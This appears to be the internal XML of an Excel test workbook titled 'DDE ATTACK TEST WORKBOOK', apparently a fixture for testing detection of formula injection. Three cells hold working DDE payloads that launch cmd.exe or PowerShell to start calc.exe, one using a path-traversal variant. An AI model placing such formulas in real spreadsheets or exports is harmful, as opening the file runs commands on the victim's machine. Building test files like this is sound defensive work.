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 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haredStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="0" uniqueCount="0"/>
</file>

<file path=xl/_rels/workbook.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>
    <Relationship Id="rId2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DDE ATTACK TEST WORKBOOK</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>This workbook contains DDE formulas:</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="str">
        <f>=cmd|'/c calc.exe'!A1</f>
        <v>DDE Formula 1</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="str">
        <f>=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!A1</f>
        <v>DDE Formula 2</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="str">
        <f>=cmd|'/c powershell.exe -Command "Start-Process calc.exe"'!A1</f>
        <v>DDE Formula 3</v>
      </c>
    </row>
  </sheetData>
</worksheet>
</file>